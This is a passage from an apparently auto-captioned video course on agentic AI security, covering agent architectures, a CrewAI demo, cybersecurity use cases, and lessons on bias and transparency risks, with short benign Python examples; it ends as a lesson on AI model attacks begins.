work in practice. So we have multiple types of augentic AI architectures
which are there. There might be more. You might see article 0R a
course, which has more. But honestly, all of them originate from
one of these three, which is the single
agent pattern, which is a single agent operating independently
to achieve a goal. You might have a
distributed agent, which is multiple agents working together through
communication channels, and trust is established between them or a supervised
agent architecture, which is like a hierarchical. So you have an org chart, right? The top agent like we saw here, which is the technical lead
looking at the coding agent, the solution design agent,
and the security agent. So you might have a supervised
agent architecture. So the single agent
the distributed agent and the supervised agent. So if you look at the single agent architecture, this is what it'll
look like, right? So you might be prompting it. Find and book me
the best flight to Europe, and the AI agent, like we talked about earlier, will perceive, it'll first understand it. Okay, maybe you prompted it, you just give it a text prompt, it'll understand. Then it goes to the reasoning, which is where it'll call the large language model, probably some sort of
generative AI to understand. Hey, what is the
person asking me? The next step is breaking
it down and acting. So it'll break tasks
down into actions, and it will invoke the API, the tooling, which we
talked about earlier. And it'll start
taking those actions. And it'll learn from it.
Maybe some mistakes happen, some issues happen, it'll learn from it and move forward. So this is where we can see the power of agentic AI coming in, in the
single agent architecture. This is an image from the
World Economic Forum. This is how they show how an AI agent works. You can see it's based on pretty much the same idea. Even though this diagram and this diagram
don't look the same, the architecture,
you'll be surprised it's still the same
because you have the user input coming in, and it goes to the sensor. The sensor is how
it's perceived. And then you have
the Control Center, which is taking the decisions and you're getting and
it's learning here, and you're getting
the output back. So all these together, these components enable
agents to perceive, learn, plan, interact,
and communicate. So they're pretty much the same concept that
you're seeing here, you're seeing it here also. So this is how a single agent
architecture will work. You might have a
requirement, you know, like we said, that find and book me the best flight to Europe, where you don't need
multiple agents. A single agent is enough. So this is how a single agent
architecture would work. Now moving ahead,
you might have a distributed or a network
agent architecture. In this setup, all
agents or systems can communicate with
each other to reach a consensus that aligns. So multiple agents are
working together through communication channels,
and usually have a trust, maybe it's to digital
certificates or some sort of authentication where they
are trusting each other. The simplest example I can give you is, like, if you've seen autonomous vehicles, like self driving vehicles, which don't need humans to drive them. Wherever you have multiple
autonomous vehicles parking in like a tight space, they will communicate
with each other, right? They will communicate to avoid a collision from happening. So all of them are
communicating with each other with a common
goal of parking. So allowing them to coordinate effectively and reach consensus. This is where a network agent architecture would
be suited for. And the other one is the
supervised agent architecture. So like I said, in this model, you might have multiple agents which are being supervised. So a supervisor it is coordinating
interaction with them. So it is useful when agents
can converge and diverge. They're not able to
reach a consensus. So this is where the
supervisor agent can mediate and prioritize
what are the objectives. The finding like a
compromise, you know? And example of this
would be like where a buyer and seller cannot reach a consensus
on a transaction, which is then mediated
by a higher level AI agent supervisor. And, you know, you can even
have a human being there. Like the AI agent
might call a human. So you might have a human in the loop here who is doing this. But this is how
basically it looks like. And this is, again, from
a World Economic Forum, you can see the agent
architecture here, the agent architecture and the supervised
architecture there. So the best of all thing is, all of these things do not
have to work in isolation. So it is very possible you might have a combination of these architectures working together as agentic AI becomes more and more powerful and gets implemented. So the future is likely to see multiple agent architectures
collaborating. You know, you might have an agent infotainment system
which is in your home. It is collaborating with
your autonomous vehicle, which is using a supervised
agent architecture or a network agent architecture
to reach a consensus. All of them connected to millions and millions of other AI agents that are doing, like, smart city coordination. So this multi agentic AI architecture
can be considered as a future type of system
that can coordinate agent actions among multiple architectures
which are there, you know? So you can imagine just
how powerful this can be. We were talking
about the futuristic form of power that agentic AI can bring. And I really wanted
you to understand. So just to see where
this is going, how the world can change
once we have agentic AI, like, more commercialized and more available. So which one do you use? So you have these sort
of architectures. And, of course, this is just
my 100% subjective opinion. It is entirely possible
other use cases are there. But usually, a
single agent pattern is better for simple
autonomous tasks. You know, when you need a
single agent to perceive reason and act without the
need for other agents, like when the AI
needs to interact with APIs, security
logs, databases, like standalone automation,
where honestly, you do not need to have
a consensus when you don't need to have multiple
agents working together. This is simple.
Like you might need an AI agent to monitor some
logs and take actions. A simple agentic AI
will be here, right? So because you don't need
multiple agents to be present. So this is where a
single agent will work. Distributed agent
patterns, it's best for complex multi step
and scalability, because when tasks need multiple specialized AI agents to collaborate to
achieve a goal, this is where a distributed
agent pattern will come in. This is best suited for large scale enterprise AI
applications, you know, that require parallel processing because you need to be able to handle those tasks
asynchronously. So you might have, you know, an autonomous SOC or, like, a threat detection framework, with the incident response spread across multiple organizations, those sort of things. This is just an example I'm giving, but this is where a distributed
network architecture for agentic AI might come. And the last was the
supervisory agent. This is where you might need it's possible that you might
not reach a consensus. So you need to have some sort of a centralized authority which
can monitor and override. And this is usually
for high risk tasks. So it is entirely
possible you might have a human being there
who can review the task before executing it. So this is usually comes in
where you're talking about sensitive things which can
impact life and society, you know, financial
transactions, data protection,
those sort of things. This is very important. Like if real time decisions
can impact human life, you might need to have some sort of centralized authority
which calls a human being. And this is not usually suited for low risk automation, but, yeah, supervisory agents might be required there, because you need multi layer validation. This is where a supervisory agent pattern might come in. A toy sketch of that escalation logic is below.
has different patterns. It's not like a monolith, and it depends usually
on the use case. You can also use a
combination of patterns here. So this is just to show you the different type of use
cases that were there. Let's take a live example also, because I don't want to just be talking; I want you to see it. Let's take an example of a
multi agent architecture in practice to show you the
power of agentic AI. I'll see you in the next lesson.
5. 4.1 - Demo: Hello, everybody. Now,
this is a quick demo, because I wanted to
show you just how easy it is to create AI agents. And while you're
learning concepts, I really do want you
to check it out also. Now, I'm using CrewAI here. It's a very simple
multi agent framework built on Python. You
are not bound by this. You can pretty much use any agentic platform that you want. There are many, many
available. I'm not endorsing any particular
platform. AWS has one. OpenAI, they have just released their own agentic
AI framework also. So the point of this demo is just to show you
guys how easy it is, you can get up and
running with AI agents. And for purposes of this demo, what I'm doing is I am using CrewAI. CrewAI, like I said, is a very simple framework for creating, like, multi AI agent systems. It's very, very easy to use. I have a little background
in Python so I've used it. There are many, many
other platforms also, which don't require, you
know, any code or any Python. If you don't like Python,
no problem at all. But it's very, very easy to use. You just need to have, like, the right Python version. I'll check. I think
I have Python 3, the Python 3 version. Let me just check. Yeah, it's 3.11.8. So I'm falling within
the range which is here. If you don't have it,
you can just go here to the downloads and
get it installed. Okay. Once you
have it installed, you can go ahead and
install CrewAI. Just follow the instructions that are present here. Like I said, it's extremely easy to do it, you can go to docs.crewai.com/installation
and get it done. Once you have it, you
can literally get up and running by creating a
simple CrewAI project. Now, before you do
this, one thing I wanted to note: first of all, once you have done that, you can check this, like, to verify that the crew is installed. Just make sure that CrewAI is actually installed properly before
with HAGPT and OpenEI. You need, API key for this. If you like, used, OpenEI you can just grew here
to platform dot OpenAI, go to your profile,
which is here. And within your profile, there's like user API keys here. Sorry, APIKys. Yeah. And you can create
a new API key here. You need a API key because
the agent will need an LLM, right at the background for
its reasoning and everything. You're not bound by Opene. You can use pretty
much everything. But as you see, it will
require it will need access to an API key once you get a project
up and running. So let's get this started.
What do I have to do? It's very easy to start
your very first project. Let's let me go to my
desktop here. Okay. So all I have to do is crewai create, and the project name. So, my first crew AI, let's do it like this. Let's see what happens. So it should be asking me what sort of, uh... Oops. Sorry, my apologies. I forgot to write crewai create crew and then my crew AI. Yeah. Yeah, so you can see here. It's going to ask what sort of provider you want to set up. So I will go with OpenAI. Like I said, you can go
with Anthropic, Gemini, NVIDIA. All of them are available. So let me just put OpenAI. And then it's going to ask
me what sort of model. I'll use GPT-4o because I'm more familiar with that and
I use that quite a bit. Yeah. So you can see here, it's going to need your OpenAI key. I'm going to put it here, so it can use that to communicate, if you should have your OpenAI key created. So let me just paste it here. Yeah, as you can see, it has successfully created my first CrewAI project
on the desktop. So what I'm going to
do is I'm going to now switch to VS code and
see how it's going. Okay, so we are in
Visual Studio code. Let me just make the window a little bit bigger so
it's easier to see. But now, so I've opened the project it created on the desktop, as
you can see here. If you go here, yeah. All those files have been
created, as you can see. Now, if you look at
the structure here, which is written here, these are the files
that it creates, yeah, you can see the crew.py, the configuration files. If you go here, there's an agents.yaml file. If you go here, you can see this is what it's
talking about, right? It has created two agents. One is a researcher, and it says you are a
senior data researcher. This is the role the goal is
what it's supposed to do. And then it is a
backstory that you are a seasoned
researcher with a knack for uncovering the latest
topics and everything, right? It's pretty cool. And then it says you are
a reporting analyst, so it's going to take
whatever data it says and give it to
the reporting analyst, so it can generate
a report here. And these are the
tasks that it gives conducted a thorough
research about the topic, and this is given to
the researcher agent. And the next one, it takes the research but the
researcher does, and it gives it to the reporting analyst. So the initial project of this is pretty easy to do, honestly speaking. I'm not going to be
making much changes. And if you go here,
you don't need to know too much, like, Python for this. If you have issues understanding this, if you want to deep dive, you can copy paste it literally into ChatGPT and ask it to explain it to you. But basically, it creates, like, a crew, and what it does is it gives it the tasks. A simplified sketch of what this crew definition roughly looks like is below.
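For reference, here is a simplified sketch of the kind of Python the scaffold generates, written from memory of CrewAI's documented Agent, Task, and Crew classes. Exact signatures, file layout, and YAML-based configuration may differ between CrewAI versions, so treat this as an approximation rather than the generated file itself.

```python
# Simplified approximation of a generated CrewAI crew (not the exact scaffold output).
# Requires `crewai` to be installed and an OPENAI_API_KEY set in the environment.
from crewai import Agent, Task, Crew

researcher = Agent(
    role="Senior Data Researcher",
    goal="Uncover the latest developments about {topic}",
    backstory="A seasoned researcher with a knack for finding relevant information.",
)

reporting_analyst = Agent(
    role="Reporting Analyst",
    goal="Turn research findings about {topic} into a clear report",
    backstory="An analyst who writes well-structured reports from raw research.",
)

research_task = Task(
    description="Conduct thorough research about {topic}.",
    expected_output="A list of the most relevant findings about {topic}.",
    agent=researcher,
)

report_task = Task(
    description="Expand the research findings into a full report.",
    expected_output="A markdown report covering each finding in detail.",
    agent=reporting_analyst,
    output_file="report.md",
)

crew = Crew(agents=[researcher, reporting_analyst], tasks=[research_task, report_task])

if __name__ == "__main__":
    crew.kickoff(inputs={"topic": "Agentic AI Security"})
```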
Then in the main file, this is actually the topic it's going to be researching, AI LLMs. I can literally change this and it can talk about
a different topic. But let's try and get it done and see
what happens, right? So let me open a
terminal here, right? Now I'm in the folder of this. So let me try and get it going. The first thing you have to do is get it installed, through crewai install. So what is it going to be doing? Yeah, it's basically downloading the stuff that it needs
to get it up and running. That's pretty cool. Okay,
as you can see here, now it's ready to run. So what I'm going to
do is I'm going to run our very first agentic
AI application, and we're just running the
demo which comes with this. So what it's going to do is it's going to look at AI LLMs. There are gonna be
two agents running. One is going to go and find out about AI LLMs. And then the second one is going to generate
a report for me. Let's see what happens. Running the crew. Yeah,
this is pretty cool. So you can see
here, it has gotten the data research now is
doing the task, right? Is getting all the data here, and it's getting
the information. And the second one
is the analyst, which is reviewing the reports,
which is there, right? Ah, task completed, task
completed. That's pretty cool. So it should have
generated that report now. And if you go to report.md, this is where the... as you can see, this is pretty amazing. A report on the evolution and impact of AI LLMs, right? Transformative, different. So you can see here, one
agent did the research and the other one that is the one that basically
created the report. So one was the researcher,
one was the reporter. As you can see, if
you go to the agency, I'll file, the researcher
and the reporting analyst. Let's change it a little
bit and change the topic. Instead of this, why don't I use the topic of our course, which is agentic AI security? Yeah. Let me save this and let me try it again. This should be interesting. So now I want it to talk about agentic AI security. So let's see. Agentic AI security senior data researcher, yeah? That's pretty cool. Status: completed. Now, let us take a look at our report. Ah, Agentic AI Security Report, 2025. That's pretty cool. So you can see here it has now given you a
simple report also. So I want you to play
around with this. If you don't like CrewAI, feel completely free to check out something else. I'm not binding you to this platform; I just wanted to show you just how easy it is to get up and running with AI agents. You can deep dive more into this. I don't want to tie you to any particular tool right now, because it's more
important for you to understand the concepts and everything and
how it's working. Okay? So I hope this gave you a good idea
of how easy it is to get up and running with your very first agentic
AI application. Thank you very much, and I'll
see you in the next lesson.
6. 5 - Agentic AI in Cybersecurity: Hello, everybody. Welcome
to this new lesson. Now, we've talked
about agentic AI, and we've seen a few examples. Now, before we jump into the risks and the security
issues of agentic AI, I do want to talk
about the use cases in cybersecurity when it
comes to agentic AI. Now, if you've been
working in cybersecurity, I've been in cybersecurity for the past like 20 years and I've seen how this industry
has changed, you know? And if there is anything
about cybersecurity, it's that it's defined by how quickly the landscape
changes, you know. Threats have become faster, more complex, and security
systems have adapted. So it's a constant game of
cat and mouse, you know? And agentic AI is poised to be just as big a leap forward
as generative AI was. In 2022, when generative AI came up, cybersecurity teams were scrambling to find out things about prompt injection and hallucinations, things which they'd never thought about before. And we also started using it for cybersecurity. So that's what I wanted to cover: the application of agentic AI in cybersecurity and the
potential use cases. And with the disclaimer, this is very much an emerging field. This is still very much
at the beginning phase. We are still understanding
the potential of agentic AI. So I do want to put
that disclaimer. It's very possible even more
use cases will come out. But so let's take a
step back, right? As of today, AI is already being widely
used in cybersecurity. A lot of security solutions have machine learning
AI built inside. You know, you have AI-driven endpoint detection and response systems; SOAR and SIEM solutions have AI. AI has become very much
integrated within cybersecurity. So agentic AI is going to be the next evolution, right? It's going to change even more, because now we're talking about AI that can autonomously plan and act instead of automating
just single tasks, unlike traditional
automation in cybersecurity, an AI agent can act more like an independent
security analyst, making independent
decisions, not asking the cybersecurity team about anything it can
make decisions by itself. So we are shifting
from automating individual tasks
like log analysis, alert taging to AI acting, like I said, an independent. So we're not talking about AI flagging in sients but
proactively responding, coordinating defenses, improving the security posture,
those sort of things. This will, of course, lead to a large displacement
of tasks and roles. I'm not saying that cybersecurity is going to get replaced, that'll never happen. But agentic AI
could replace many, many routine
cybersecurity roles, you know, like the
Elvin stock analysts, threat researchers,
incident responder, they may see their roles evolve or shrink as AI takes
over repetitive work. We could see as it becomes
even more powerful, you could see instead of just automating
incident response, agentic AI could handle
the entire SOC function such as threat analysis, incident response,
risk assessments, the potential is
very much there. But of course, we also have to think about the
ethical concerns. Are companies going to be comfortable handing over all their cybersecurity to AI agents? Of course, that'll never happen. You need human oversight, right? But for the future of cybersecurity careers, at least from where I sit, I see people moving
towards AI governance, validation, and oversight
roles instead of traditional, you know, the things
at the ground level, the endpoints and everything. And what are the
cybersecurity uses of agentic AI? There are so many. These are just a few which I've seen, like adaptive security posture, where AI agents can dynamically adjust security policies, taking context into account and executing multiple levels of functions, you know; self-healing,
zero trust networks. We talk about zero trust where the network cannot
assume safety from anyone, and we need to improve security posture based
on what's happening. AI agents could really
continuously verify and remediate vulnerabilities have that continuous
authentication going on without any
human beings involving. Of course, this will lead
to reduced human workload. We already talked
about SOC teams. You can have a continuous
penetration testing, red teaming, not just
vulnerability scanning, a proper red teaming
penetration testing happening by agents that are getting better and better at
understanding your environment. And even agentic
AI virtual CSOs. Before all the CSOs get mad at me, I'm talking about AI acting as a semi-virtual CSO, advising organizations on risk assessments,
compliance, you know, This is especially
useful for SMB, small to medium business that simply cannot afford
a full time CSO. So we already have
the concepts of CSOs. We could see the concept of
agent virtual CSOs coming in. I'm going to get a lot of, like, angry people commenting
based on this. But I do see this happening: look at agentic cybersecurity professionals who
can help teams. And, of course, agentic
AI security training. AI can train security teams
by simulating attacks. It can customize
training programs based on their
individual performance. So all of these, the
potential is very much there, you know, for
greater efficiency. Of course, with the challenges
and we'll talk about. So we talked about the earlier
single-agent pattern, right? How about somebody telling you to monitor, say if you work in AWS, the AWS CloudTrail audit trail for any cloud security violations? You could have an AI agent perceiving the events, calling a large language model to understand them, and then breaking the task down into actions and invoking APIs. This could be a very, very simple use case for an agentic AI with a single-agent pattern; a minimal sketch of the idea follows below.
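To make the perceive-reason-act loop concrete, here is a minimal sketch of what such a single agent could look like. The boto3 CloudTrail call is real, but llm_assess and respond are hypothetical placeholders standing in for the LLM reasoning step and the response action:

```python
# Minimal sketch of the single-agent pattern: perceive CloudTrail events,
# ask an LLM-style check to assess them, then act on violations.
import boto3
from datetime import datetime, timedelta

cloudtrail = boto3.client("cloudtrail")

def perceive(minutes: int = 10) -> list:
    """Pull recent CloudTrail events (the agent's view of its environment)."""
    resp = cloudtrail.lookup_events(
        StartTime=datetime.utcnow() - timedelta(minutes=minutes),
        EndTime=datetime.utcnow(),
        MaxResults=50,
    )
    return resp.get("Events", [])

def llm_assess(event: dict) -> bool:
    """Hypothetical placeholder: in a real agent this would call an LLM to decide
    whether the event is a cloud security violation."""
    return "ConsoleLogin" in event.get("EventName", "") and "Failed" in event.get("CloudTrailEvent", "")

def respond(event: dict) -> None:
    """Hypothetical placeholder for a response action, e.g. flagging or disabling access keys."""
    print(f"Flagging suspicious event by {event.get('Username')}")

def agent_loop():
    # Perceive -> reason -> act: the single-agent pattern in miniature.
    for event in perceive():
        if llm_assess(event):
            respond(event)
```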
We could also see self-healing networks, right? People talk about zero trust. So supposing you
have a distributed agentic AI like pattern, you could potentially use this
for enforcing zero trust. You could have a supervisory AI, or independent AIs, monitoring and approving identities, and all of them coordinating to reach a common consensus on the security posture. So if this is like a proper network, right, you have a DMZ and an internal network, you have privileged identity management with an SSO and an IAM system. You could potentially have AI agents on all the critical touch points, monitoring the entryways. They act like policy enforcement points in zero trust, and they keep understanding and improving. So very much this
potential is there. You could even have an autonomous SOC team, like we talked about. So in the hierarchical fashion, you have level-one SOC AI agents, and all of them are either reporting to a human or even to an AI SOC manager. So you can imagine all of them being supervised by this high-level SOC agent, which understands what they are doing and what has to be done, right?
autonomous Cloud security team. So supposing maybe you have
Cloud workloads running in AWS, running in Azure, running in Google Cloud. You could potentially deploy your agentic AI agents in all of these different workloads in a hierarchical fashion. All of them are being overseen and understood by a high-level Cloud security AI agent which is reporting to the head of Cloud Security, maybe to the CSO. This potential exists, again, because we talked about the concept of hierarchical AI, right? You have these child AI agents reporting to a parent AI agent in an org-chart fashion. So I want you to think about all these different use cases, which are very much possible. So like I said, this lesson was just
an overview; I don't want to jump straight into the negative parts of agentic AI. All these use cases are very much there. Agentic AI has many, many applications
in cybersecurity. Like I said, don't think
about jobs being replaced. Think about tasks
and the potential of agentic AI to act like an independent
cybersecurity analyst. And like I said, this is
very much an emerging field. I predict there could be
a lot of new use cases emerging as cybersecurity
catches up with agentic AI. So I hope this is
interesting for you. I'll see you in the
next lesson where we start now looking at the threats and
the risks that are coming out because
of agentic AI. Thank you very much, and I'll
see you in the next lesson.
7. 6 - Agentic AI Risks : Hello, everybody. Now.
Welcome to this new lesson. Now, we now have a
very good foundation about what agentic EI is. You've understood the
implications of agentic AI, you know, the different
types of patterns. And you've also seen like some of the
cybersecurity use cases, like what a game
changer agentic AI is. Now in this lesson, I'm going to start talking about the threats and risks because now you have a very good
foundation, right? And now you are ready to jump into the scary part
of agentic AI. And we're going to
go step by step. I'm going to build
up your knowledge because I don't want you
to jump directly into the security applications
without understanding what gets carried over and what
are the new things which are dangerous within agentic AI. So this is what we're
going to be talking about. What is it that makes agentic AI dangerous say differing from something like generative AI. And what are the existing risks that carry over and what are the new risks that are
emerging from agentic AI? So we're going to look at it step by step, building
up your knowledge. So when we talk
about agentic AI, right, and like we've
talked about before, they're not just like
your regular AI models, nor are they something like generative AI. They are a fundamental shift in how AI interacts with digital and physical
environments, right? Main thing is, of
course, autonomy. This is where everything
emerges from. There are advantages
and disadvantages. These agents can act autonomously
or semi autonomously. They can make decisions,
take actions, and achieve goals with a very
minimum human intervention. And while this opens up this whole new world
of possibilities, it also expands the threat surface very, very broadly, right? And traditionally,
AI related risks, they have been confined
to the inputs, processing, and outputs
of models, you know? And this is where
the vulnerabilities have lied with AI agents, however, the risks now extend far beyond these
boundaries. Think of the chain of events: AI agents can actually start a chain reaction which impacts other agents, and that can impact the whole ecosystem. And the worst part is, like, sometimes these attacks are
happening and human beings will not even know because they are completely shielded away. It's like a black box, right? So this whole thing,
this lack of visibility and autonomy can lead to serious security
concerns as companies struggle to monitor them and control the agents
decisions in real time. So one thing I want
you to remember, all those existing
cybersecurity best practices that they carry over, right? This course is not about existing cybersecurity
best practices. I'm sure you already know there are 1 million good
courses about them, but, you know, having
strong authentication. So while agentic AI will introduce new types of security controls and risks, you still have to comply with the existing cybersecurity practices that are foundational for any system, right: making sure that you have good, strong authentication and authorization. You know, the principle of least privilege: just like humans, agents should not be
given full access or you should make sure that you have multifactor
authentication, making sure that
you're not giving them full open access
to everything, making sure that
you're monitoring and logging and monitoring
whatever is happening; security hardening, because the agentic AI framework runs on top of something, right? Like a cloud platform, maybe an AWS account, an Azure account, maybe it's servers. You don't know, but you
have to harden them as per best practices
from the provider, making sure that
data is encrypted. Whatever data is being accessed, be it data at rest,
data in transit, it's encrypted with TLS, all the security controls, making sure that
the infrastructure is regular being scanned, any, you know, penetration testing is happening and making sure all
these things are happening. So none of the stops. You still have to
do these things. But now when we talk
about the agentic AI, so there are certain existing risks that are
there in agentic AI, which are present in pretty much any AI application. The nature of AI leads
to these issues, which are bias, lack of transparency, data and model poisoning, evasion, and model extraction. These risks are inherent to any AI system, but
on top of that, we have new risks emerging which were not there before, like autonomy, which I talked about (I'll discuss each of these things, don't worry); accountability, which is a direct result of autonomy; misalignment, again a direct result of autonomy; disempowerment; misuse; and agentic
security vulnerabilities, which come out because of the patterns that
we saw, you know, multi agents,
distributed agents, hierarchical agents, all those things. The patterns have certain vulnerabilities
which are there. So this is what I want
you to think about. So we have existing risks
and we have new risks. Now, in the next lesson, because this was just
the introduction, I'm going to now we're going to talk about the existing
risks which are there, which carry forward, which
are there in any AI system. So I'll see you in
the next lesson.
8. 7 - Bias : Hello, everybody.
Welcome to this lesson. Now in the previous lesson, I gave you an introduction about how agentic AI, the
risks which are there. Now, in the first lesson of this section we're
going to talk about, like the existing
threats and risks. And I've talked to
you about this before that there are certain risks
that carry over, you know, and these risks are present
in any AI system like bias, transparency, data
model poisoning, evasion, model extraction. Pretty much any AI
system is vulnerable, be it generative AI, be it machine learning or agentic AI. So let's talk about these
type of risks first. And usually when you're
using agentic AI, most of the people
or the companies, they rely on a
third party, right? So these risks will mostly not be applicable if your company is using agentic AI from
a third party provider. Usually these risks are applicable to the people who are building these agents, okay? Nine times out of ten, this
is where the risks will lie. So let's look at it one by one. I'm going to talk about the
first one, which is bias. The bias, we're going
to talk about first, okay? So what is bias? Now, this is very,
very common risk, which is present in EI systems, be it agentic AI, be
it generative AI. And since agentic AI is trained on historical data, it can inherit biases that are present in that data, and that can actually skew
their decision making. So like I said, this is an inherent risk present
in all AI systems. This is not unique
to agentic AI. This is not unique
to generative AI. Any AI because AI the AI system, it works by analyzing
data and then making decisions or finding
patterns based on this data. But what if the data
itself is skewed? What if the data is not representing the
actual population? What is going to happen is the decision making
will be wrong, and this can have actual
real life impacts, you know, because biases which
are present in the training data that
can be perpetuated by AI. That can be carried forward by AI in their decision making. So if an EI system is trained on data that reflects biases in how certain
groups are treated, it may disproportionately flag those users as potential
security threats, you know, for law enforcement, and
that can have a massive, massive impact on a company,
on their reputation. So, for example, let's look at an example of bias in
loan approvals, right? So maybe you have an agentic AI, it uses an AI agent
bank officer to process loan applications and assign
risk scores based on that. But data on which the AI agent is
trained is biased because the data was
not given properly. It did not represent
the full population that was there. So what
is going to happen? The EI agent is going to
automatically deny loans to applicants from lower
income neighborhoods, just from the neighborhood. It's going to look and say, No, this guy cannot
pay off this loan. Sorry, I'm not going
to give this loan. Or it may unfairly lower the credit score for
certain ethnic groups, certain races, because the training data was
like this, right? Or maybe it can reject
freelancers and self employed people
because traditional models, they favor salaried
people, right? Unfair treatment
of certain people. This can be perpetuated because the data on which this agent
was trained was incorrect. Or what else is there? Bias in law enforcement, right? And very, very dangerous.
A police department may be using agentic AI for facial recognition and
predictive policing. But the data on which the EI
agent is trained is biased. Maybe a particular race,
a particular nationality, a particular ethnicity was like the training data makes it seem as if only that
race is committing those sort of crimes.
What will be the result? The AI agent will
wrongfully identify minority individuals in criminal investigations. It'll adjust the risk score and say this guy, he is more likely to
commit a crime as opposed to this person
because he's from this race. And it'll lead to police police officers being concentrated in
certain neighborhoods, leading to biases in society
because people will think, only we are being
targeted, right? And this can have
a chain reaction. Like I said, it's so dangerous. And unfortunately, this is not theoretical. This
has actually happened. In real life, you
have scenarios where innocent people were
actually arrested, based on a mistake, based
on biases which were present within the training
data. So this is no joke. This is a very, very
serious implication of AI and this has always been present within AI
decision making, but agenda AI will take it
to the next level because the decision making
will be automatic and if the data is biased, that can have serious
ramifications going on, right? So what can we do about it? Well, there are many many ways. There are testing frameworks where the model is
tested for bias. So you can actually check whether the training and testing data are actually reflective of the entire environment, of the entire society, or just focused on a particular group; a minimal sketch of that kind of check follows below.
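As a rough illustration of that kind of check, here is a minimal sketch using pandas on a made-up loan dataset; the column names and values are hypothetical, not from any real system:

```python
# Minimal sketch: check representation and outcome gaps in training data for a loan model.
import pandas as pd

df = pd.DataFrame({
    "neighborhood_income": ["low", "low", "high", "high", "high", "low"],
    "approved":            [0,     0,     1,      1,      1,      1],
})

# 1. Is every group actually represented in the data?
print(df["neighborhood_income"].value_counts(normalize=True))

# 2. Do approval rates differ sharply between groups? A large gap is a red flag for bias.
print(df.groupby("neighborhood_income")["approved"].mean())
```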
The AI must also justify why a decision is being made. If it is denying a loan, if it is, like, making the decision to arrest somebody, or making a decision not to hire somebody, what was the thinking or
reasoning behind this? And users must be
able to challenge these AI decisions
if they seem unfair. So you must have this mechanism where a human being
can escalate, I want a human being
to verify this. So this is what we
call a human in the loop approach for sensitive areas like
law enforcement, like hiring, and all these AI
systems must be auditable. So you can actually
go and track, Okay, it made a decision
based on this data set. What was the reason behind this? And there are datasets like I said, you
have testing frameworks. You can actually check whether this dataset is containing
the whole population or not to make sure that
the bias is not present. So this an existing risk in all AI application which
gets carried forward, you have to make sure
that these risks are mitigated also because
it's very easy to focus on agentic AI risk and miss the inherent risk is
lie hidden in all AI systems. So I hope now you had a
better understanding. Next, we're going to
talk about other things which are things
like transparency. So I'll see you in the
next lesson. Thank you.
9. 8 - Transparency: Hello, everybody.
Welcome to this lesson. Now, in this lesson, we're going to be
talking about something related to bias, which
is transparency. And this is, again, this is an existing ist which is
there in most AI systems, and which can really
cause you a lot of problems if you don't understand what it is
and how to deal with it. So like I said, this
is an existing risk, but it is magnified by agentic AI. What is transparency exactly? When AI systems, you
act like black boxes, meaning that the
decisions they make or how they reach a conclusion
or how they reach an action, that is sometimes not
immediately understood. I mean, you cannot understand why this particular
decision was made. And this can lead
to a lot of issues. This can lead to
trust because how can you trust an EI system if you don't know
how it was able to reach a decision wide? And accountability concerns,
regulatory violations. A lot of the new AI laws which have come
out like the EU AI at or frameworks like a NIST AI risk
management framework. They specifically focus
on transparency and you focus on how EI should
not be a black box, it should be explainable. That is the decisions
that are making, all of them have
to be explainable. Now you can understand,
like I said, this risk has always
been there in AI, but how it becomes
magnified with agentic AI. Because now you're not
just making a decision, you are actually taking actions
based on those decisions. So you can imagine this risk, like I said in the
very first bullet, this becomes amplified
considerably when you are looking
at agentic AI, and that's why it's so important
to deal with this thing. So for example, uh, let's take one example,
hiring decisions. So maybe you have
replaced your HR officer, the junior HR officer with agentic AI, for
hiring decisions. So the hiring EI agent, it is now rejecting
female applicants at a much higher rate than
male applicants, right? The company does not know why
the EI is rejecting them. And Imagine if some of these applicants they
take the company to court, and they say that they
are being discriminated against because of their gender because there is no reason. And the company is
not able to explain why apart from the
most obvious reason that it was because
of their gender, that the AI is
reaching decision, they do not have access to the AI decision
making capability. So this will, of course,
lead to a lot of like court decisions against
them, reputational damage, and honestly, negative
publicity for the company that this company
has implemented in AI, which is actually making
unfair decisions. And like I said,
this is nothing new. Literally, like a few days back, I saw this that most of the
fast food companies here, the delivery companies
here in the UK, they have been asked to explain
how are their algorithms making decisions based on how the drivers are
being allocated, because they do
not have this like I said black box, right? So transparency becomes
a major, major issue. With AI. And this is not specific to agenda
AI, like I said. How do we deal with it? There are many mitigations. The first one is explainable AI, which means AI systems that can provide a clear and understandable explanation for their actions and decision making. So the decision making has to be transparent and interpretable to humans, because there's a lack of transparency there, right? This aims to remove some of the complexity behind those AI decisions: the AI provides a human-readable explanation for its decisions. And this leads to building trust, right, because now the company can trust the AI application, because the AI has become more transparent. And if somebody challenges you, if somebody says, hey, this decision against me is biased, I'm being discriminated against, then you can actually show: look, this is how the decision was made, based on these factors, these inputs, and this data the AI model made this decision. A minimal sketch of what that can look like in practice follows below.
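To make explainable AI a bit more concrete, here is a minimal sketch, my own illustration rather than anything from a specific product, using the open-source SHAP library on a toy loan-approval classifier; the features, model, and data are made up for the example:

```python
# Minimal sketch: explain which features drove a toy loan-approval model's decisions.
import numpy as np
import shap
from sklearn.ensemble import RandomForestClassifier

rng = np.random.default_rng(0)
X = rng.normal(size=(500, 3))              # toy features: income, debt ratio, years employed
y = (X[:, 0] - X[:, 1] > 0).astype(int)    # toy approval label

clf = RandomForestClassifier(n_estimators=50, random_state=0).fit(X, y)

explainer = shap.Explainer(clf.predict, X)  # model-agnostic explainer with background data
shap_values = explainer(X[:5])              # per-feature contributions for five applicants
print(shap_values.values[0])                # why applicant 0 got their decision
```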
And like I said, this has now become a major, major factor in most of the best practices like the EU AI Act and the NIST AI Risk Management Framework. So complying with these standards will actually help prepare your company for something like agentic AI. So that was transparency. Again, this is very important.
people who are building the AI systems and not as much to the company who
is implementing it. But with agentic,
you should have a holistic understanding of where these issues
are coming from. Okay, so thank you very much, and I'll see you in
the next lesson.
10. 9 - AI Model Attacks: Hello, everybody.
Welcome to this lesson. Now in this lesson, I'm
going to be talking about the AI model and data attacks, which are common across all AI systems. You know, it doesn't matter if it's a fancy high-tech agentic AI system or a very basic machine learning algorithm or a generative
AI application. Usually these attacks
are very common. Now, before we understand, I just want you to
understand what a typical life cycle
of an AI model is, this is a very
simplistic example because I want you
to understand. Usually, how does it understand? Most companies, they don't build an AI model from scratch. Usually, they use
something which is already present in a
model repository, right? So they take this
prebuilt model and then they train it on their data to create their
own customized model, the model is trained on
certain data on the company's own and then you have an application which
can use this model, which is exposed through API. So usually this is how a
company will use AI model. For example, if
you have example, implementing a fraud
detection system, so you will take
an existing model. You won't build it from scratch because the amount of
time and data that takes is astronomical so
you will take this model, but you will train it on
your company's own data. And then you will
expose it through an application through APIs, so users can consume
this application. This is a very simplistic and a high level example of how the life cycle of
an AI model is. So what are the
attacks which have historically been there,
the most common attacks. So these are the common
